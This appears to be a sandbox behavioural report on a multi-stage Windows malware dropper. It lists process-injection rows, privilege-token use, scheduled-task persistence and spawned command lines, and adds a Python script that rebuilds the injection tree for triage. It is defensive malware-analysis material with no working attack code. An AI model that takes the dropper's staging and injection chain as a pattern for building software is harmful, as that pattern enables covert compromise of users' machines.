Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4952 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
PID 4952 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
PID 2324 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
PID 2324 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 2572 wrote to memory of 3984 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
PID 2572 wrote to memory of 3984 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
PID 4932 wrote to memory of 3284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
PID 4932 wrote to memory of 3284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3888 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3888 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
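
The rows above are one entry per WriteProcessMemory call, so the same parent/child pair appears several times and the chain of stages is hard to read off the table. The script below is an added example (not part of the sandbox report) that parses rows in this exact layout, de-duplicates them, rebuilds the injection/launch tree, lists the leaf processes (the final payloads) and flags the one case where a process writes into a fresh copy of its own image (3572 -> 3636, both 09b9624c6ac9.exe). It assumes image paths contain no spaces, which holds for every row in this table; the sample rows are transcribed from the table and embedded inline.

```python
import re
from collections import OrderedDict
from ntpath import basename

# Constructed sample: rows transcribed from the WriteProcessMemory table above.
# The sandbox logs one row per WriteProcessMemory call, so parent/child pairs
# repeat; three copies of the first row are kept to exercise de-duplication.
SAMPLE_ROWS = r"""
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4952 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
PID 4932 wrote to memory of 3284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
"""

# Row layout: "PID <src> wrote to memory of <dst> <indicator> <src image> <dst image>".
# Assumption: image paths carry no spaces, which holds for every row in this table.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")


def parse_rows(text):
    """Unique (src_pid, dst_pid, src_image, dst_image) tuples in first-seen order."""
    seen = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            seen.setdefault((int(m[1]), int(m[2]), m[3], m[4]), None)
    return list(seen)


def build_tree(events):
    """Map PID -> image path and PID -> parent PID (the root has no parent)."""
    image, parent = {}, {}
    for src, dst, src_img, dst_img in events:
        image.setdefault(src, src_img)
        image[dst] = dst_img
        parent[dst] = src
    return image, parent


def lineage(pid, image, parent):
    """Image basenames from the root of the chain down to pid."""
    chain = []
    while pid is not None:
        chain.append(basename(image[pid]))
        pid = parent.get(pid)
    return chain[::-1]


def leaves(events):
    """PIDs that were written to but never wrote to anyone: the final-stage payloads."""
    writers = {e[0] for e in events}
    return sorted({e[1] for e in events} - writers)


def self_writes(events):
    """A process writing into a fresh instance of its own image. Read together with
    the 'Suspicious use of SetThreadContext' signature in this report, that is the
    usual hollowing / self-injection shape (an interpretation, not a sandbox verdict)."""
    return [e for e in events if basename(e[2]).lower() == basename(e[3]).lower()]


if __name__ == "__main__":
    events = parse_rows(SAMPLE_ROWS)
    image, parent = build_tree(events)
    for pid in leaves(events):
        print(f"{pid}: " + " -> ".join(lineage(pid, image, parent)))
    for src, dst, src_img, _ in self_writes(events):
        print(f"self-write: {src} -> {dst} ({basename(src_img)})")
```

Running it on the sample prints three leaf chains, each six images deep (sample -> setup_installer.exe -> setup_install.exe -> cmd.exe -> dropped stage -> payload), and the single self-write. The de-duplication matters for triage only; for timeline work keep the raw rows, since the number of writes per pair is itself evidence of how much was injected.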

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3744 -ip 3744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 560

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2104 -ip 2104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1016 -ip 1016

C:\Windows\SysWOW64\WerFault.exe

